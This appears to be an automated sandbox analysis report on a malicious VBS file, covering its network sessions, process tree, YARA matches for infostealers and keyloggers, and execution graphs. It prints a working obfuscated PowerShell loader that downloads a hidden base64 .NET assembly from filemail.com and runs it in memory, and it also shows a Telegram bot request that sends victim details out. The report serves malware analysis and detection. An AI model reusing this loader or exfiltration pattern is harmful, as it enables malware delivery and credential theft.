Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 573927
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qX8jeSE7mgkT3TjXScup7eB4QceewbW4zXJvTAZruwxun17utZigu7vmfDUyrRC6CnrWCL1ar%2FynB%2BHijI4dJjX55rvTAe7hLODRssL1%2FJxUPltdGR5U2pLu2c9DZDyDW1ifytlQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8888e4ae8e43be-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1582&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1813664&cwnd=217&unsent_bytes=0&cid=965060de31efd7b6&ts=449&x=0"
2024-11-26 08:33:38 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49724 | 172.67.177.134 | 443 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:33:40 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-26 08:33:41 UTC | 849 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:33:41 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 573930
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6wW%2BdxRqQY0SzGZszZ46f3rTm5NqyyV7jOdbh2nES08L3aQQB%2Boej78yRtgncLkrxeYhpA08WmtngWw04Kqa5JPvpmgrfaS3NpEl0k5btuhNrqdXOVEQ80XydeiWGyyfg2YIAviH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8888f83a1b4391-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1555&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1828428&cwnd=236&unsent_bytes=0&cid=77d25c2370d76d69&ts=471&x=0"
2024-11-26 08:33:41 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49726 | 172.67.177.134 | 443 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:33:44 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-26 08:33:44 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:33:44 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 573933
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W1NeLvJkjJ%2FngWbpYwYs8r%2BT08ylSeRIxcRzGaSqUmD1W6aUriewXYN22ZyOKjN3eNedwq%2FvzUU0QyOdQf56v%2FI5rNgWNFosVbpsTIqiMJF3c%2FeXamxkJ9a3DBxsdxoJfBJdT9DH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e88890c49ef78dc-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2083&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1416100&cwnd=174&unsent_bytes=0&cid=b2e098932f2aa5f8&ts=458&x=0"
                                                                                                                                                                      2024-11-26 08:33:44 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49728 | 172.67.177.134 | 443 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:33:47 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
2024-11-26 08:33:47 UTC | 849 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:33:47 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 573936
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2O9ycoNo1Pwmc5QaqWegOsWsuOo8SvVykyqyx1mt4RSq97qSkZjLv53YGZBj6uPZo8cFrTRb6eisieY1%2B8D0XTohVgupH9mHgx1hq9P5i0d7Zgfz1FfNt8PbiiCJuC2Mm693jux%2B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e88892098768c75-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1899&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1520041&cwnd=208&unsent_bytes=0&cid=347c0f06939129aa&ts=471&x=0"
2024-11-26 08:33:47 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49730 | 149.154.167.220 | 443 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:33:49 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2027/11/2024%20/%2008:13:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-11-26 08:33:49 UTC | 344 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Tue, 26 Nov 2024 08:33:49 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 08:33:49 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Target ID: 0
Start time: 03:32:46
Start date: 26/11/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs"
Imagebase: 0x7ff719660000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 03:32:51
Start date: 26/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 03:32:51
Start date: 26/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 03:32:53
Start date: 26/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 03:33:17
Start date: 26/11/2024
Path: C:\Windows\SysWOW64\OneDriveSetup.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\OneDriveSetup.exe"
Imagebase: 0xb40000
File size: 30'870'320 bytes
MD5 hash: 0EA845F896C821E04009C0336D7547EC
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:false

Memory Dump Source
• Source File: 00000002.00000002.2028840309.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
• Instruction ID: 80d06effbd9626e5df66878cd696b72ca40218f62898a5d05fb6b131923daca6
• Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
• Instruction Fuzzy Hash: F401677111CB0D8FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661D636E882CB45

Execution Graph

Execution Coverage:13.7%
Dynamic/Decrypted Code Coverage:25.6%
Signature Coverage:39.3%
Total number of Nodes:219
Total number of Limit Nodes:32
execution_graph: serialized node and edge list of the interactive execution graph (219 nodes, 32 limit nodes) not reproduced here. API-call nodes in the graph data include LdrInitializeThunk, HeapCreate, GetCommandLineA, OleInitialize, GetCurrentProcessId, CreateToolhelp32Snapshot, Module32First, Module32Next, CloseHandle, GetModuleHandleA, FindResourceA, LoadResource, LockResource, SizeofResource, FreeResource, LoadLibraryA, GetProcAddress, VariantInit, VariantClear, SafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, SysAllocString, SysFreeString, MultiByteToWideChar, lstrlenA, GetLastError, RtlAllocateHeap, RaiseException, InterlockedDecrement and LeaveCriticalSection.

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: serialized basic-block list for the function starting at 4019f0 (entry block 4019f0-401ac7 calls OleInitialize, then the blocks call GetCurrentProcessId, CreateToolhelp32Snapshot, Module32First/Module32Next, CloseHandle, GetModuleHandleA, FindResourceA, LoadResource, LockResource, SizeofResource, FreeResource, LoadLibraryA, GetProcAddress, VariantInit, SafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector and VariantClear, with indirect calls to 847d006 and 847d01d at blocks 40234e and 402390); the interactive graph data is not reproduced here.
APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• _getenv.LIBCMT ref: 00401ABA
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
• Module32Next.KERNEL32(00000000,?), ref: 00401D02
• Module32Next.KERNEL32(00000000,?), ref: 00401DB6
• CloseHandle.KERNEL32(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
• _memset.LIBCMT ref: 00401EDD
• SizeofResource.KERNEL32(00000000,?), ref: 00401F02
Strings
Memory Dump Source
• Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
Yara matches
Similarity
• API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
• String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
• API String ID: 1430744539-2962942730
• Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
• Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
• Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
• Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
Strings
Memory Dump Source
• Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID: N
• API String ID: 0-1130791706
• Opcode ID: 90e4bc500f5b050298e83bb626056485f381faf69a8dffd0612861b534befc43
• Instruction ID: d492b065273b1258a837d34671bb63c46ed63db9af1937489320da1705682e70
• Opcode Fuzzy Hash: 90e4bc500f5b050298e83bb626056485f381faf69a8dffd0612861b534befc43
                                                                                                                                                                        • Instruction Fuzzy Hash: 2873D431D1075A8EDB21EF68C854AD9F7B1FF99300F11D69AE44867261EB70AAC4CF81
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: K
                                                                                                                                                                        • API String ID: 0-856455061
                                                                                                                                                                        • Opcode ID: 83280479ff66089c5a462806252e7f7ea7e0ef3d7778b564f9fe5073e953280e
                                                                                                                                                                        • Instruction ID: a7730007ed47ff768cd92045fcf53fbd5546bf0dfae477d4c093bedd54f58c83
                                                                                                                                                                        • Opcode Fuzzy Hash: 83280479ff66089c5a462806252e7f7ea7e0ef3d7778b564f9fe5073e953280e
                                                                                                                                                                        • Instruction Fuzzy Hash: 9733D370D147198ADB21EF68C894A9DF7B1FF99300F11C69AE44C67261EB70AAC5CF81

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4f2b82a501cd5ecb75da397ec0aef5c047e613a1370c9e3a61e626a03dc7f43a
                                                                                                                                                                        • Instruction ID: 685d3968b4c9f65d76c69f60d32047464679ed2e617d4a51147d9325cd0b85a5
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f2b82a501cd5ecb75da397ec0aef5c047e613a1370c9e3a61e626a03dc7f43a
                                                                                                                                                                        • Instruction Fuzzy Hash: B6F1E674E01218CFDB14DFA9C994B9DBBB2FF88304F5481AAD848AB355DB319986CF50

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: W
                                                                                                                                                                        • API String ID: 0-655174618
                                                                                                                                                                        • Opcode ID: 6d898e6ed9ee1e7f7c86e54fb0e4e53a7c7e71f897312114a0edfa1ff42b6917
                                                                                                                                                                        • Instruction ID: 43a9afd99063192fc53515938ab76bdbe7e447ec37f103c4362c46006b115aa9
                                                                                                                                                                        • Opcode Fuzzy Hash: 6d898e6ed9ee1e7f7c86e54fb0e4e53a7c7e71f897312114a0edfa1ff42b6917
                                                                                                                                                                        • Instruction Fuzzy Hash: 6591B374E00218CFEF54DFA9D984A9DBBF2BF89301F148069D819AB365DB305946CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0d7e54d6200c11649726497aa04852ef92b2f479774e02a5e7743ba0c17315ef
                                                                                                                                                                        • Instruction ID: 26bd24e3f8cb2618536265c0df73b8ed6ee37044a8efdd1d4a685d0f33ad1c1f
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d7e54d6200c11649726497aa04852ef92b2f479774e02a5e7743ba0c17315ef
                                                                                                                                                                        • Instruction Fuzzy Hash: EC62D56406F3D9BADF5AC778C8D4997BF5A6F82328B1843EDD4845E217C262C846C363
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
